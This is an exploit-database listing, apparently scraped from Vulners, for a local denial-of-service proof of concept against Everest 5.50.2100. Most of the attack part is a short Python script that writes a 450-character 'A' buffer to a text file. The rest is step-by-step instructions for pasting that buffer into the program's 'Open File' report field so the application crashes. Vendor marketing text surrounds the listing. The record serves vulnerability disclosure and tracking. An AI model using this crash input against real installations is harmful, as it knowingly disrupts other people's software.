Lucene search
K

Everest 5.50.2100 - 'Open File' Denial of Service (PoC)

🗓️ 27 Mar 2020 00:00:00Reported by Ivan MarmolejoType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 419 Views

Everest 5.50.2100 'Open File' Denial of Service (PoC) by Ivan Marmolejo, 202

Code
# Exploit Title: Everest 5.50.2100 - 'Open File' Denial of Service (PoC)
# Discovery by: Ivan Marmolejo
# Discovery Date: 2020-03-24
# Software Link : http://www.lavalys.com/
# Tested Version: 5.50.2100
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Home Single Language

# Steps to produce the crash:
#1.- Run python code: Everest.py
#2.- Open Everest.txt and copy content to clipboard
#3.- Open "Everest Ultimate Edition"
#4.- Select "Informe" > "Asistente de Informes" > "Next" > Select "Abrir Archivo"
#5.- In "Abrir Archivo" field paste Clipboard
#6.- Select "Next"
#7.- Crashed

buffer = "\x41" * 450
f = open ("Everest.txt", "w")
f.write(buffer)
f.close()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Mar 2020 00:00Current
7.4High risk
Vulners AI Score7.4
419